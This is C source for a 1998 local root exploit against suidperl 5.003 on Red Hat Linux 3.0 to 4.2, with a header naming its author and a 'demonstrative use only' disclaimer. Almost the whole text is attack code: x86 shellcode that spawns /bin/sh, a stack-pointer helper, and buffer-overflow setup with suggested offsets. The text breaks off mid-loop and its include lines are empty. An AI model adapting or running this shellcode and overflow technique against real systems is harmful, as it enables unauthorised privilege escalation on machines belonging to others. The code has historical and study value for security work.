/* suidperl 5.003 exploit code for x86 linux Local user can gain root access. Tested redhat linux : 3.0 , 4.0 , 4.1 , 4.2 Tested suidperl : 5.003 This program is only for demonstrative use only. USE IT AT YOUR OWN RISK! Programmed by Taeho Oh 1998/08/13 Taeho Oh ( ohhara@postech.ac.kr ) http://ohhara.postech.ac.kr PLUS ( Postech Laboratory for Unix Security ) http://www.postech.ac.kr/plus PosLUG ( POStech Linux User Group ) http://www.postech.ac.kr/group/poslug */ #include #include #define DEFAULT_OFFSET 0 #define NOP 0x90 char shellcode[] = "\xeb\x1f" /* jmp 0x1f */ "\x5e" /* popl %esi */ "\x89\x76\x08" /* movl %esi,0x8(%esi) */ "\x31\xc0" /* xorl %eax,%eax */ "\x88\x46\x07" /* movb %eax,0x7(%esi) */ "\x89\x46\x0c" /* movl %eax,0xc(%esi) */ "\xb0\x0b" /* movb $0xb,%al */ "\x89\xf3" /* movl %esi,%ebx */ "\x8d\x4e\x08" /* leal 0x8(%esi),%ecx */ "\x8d\x56\x0c" /* leal 0xc(%esi),%edx */ "\xcd\x80" /* int $0x80 */ "\x31\xdb" /* xorl %ebx,%ebx */ "\x89\xd8" /* movl %ebx,%eax */ "\x40" /* inc %eax */ "\xcd\x80" /* int $0x80 */ "\xe8\xdc\xff\xff\xff" /* call -0x24 */ "/bin/sh"; /* .string \"/bin/sh\" */ unsigned long get_esp(void) { __asm__("movl %esp,%eax"); } void main(int argc,char *argv[]) { char *buff,*ptr; long *addr_ptr,addr; int offset=DEFAULT_OFFSET,bsize; int i; if(argc==1) { printf("Try suidperl-ex 1240 (Redhat 4.0 , 4.1)\n"); printf("Try suidperl-ex 3092 (Redhat 4.2)\n"); exit(0); } if(argc>1) bsize=atoi(argv[1]); if(argc>2) offset=atoi(argv[2]); if(!(buff=malloc(bsize))) { printf("Can't allocate memory.\n"); exit(0); } addr=get_esp()-offset; ptr=buff; addr_ptr=(long *)ptr; for(i=0;i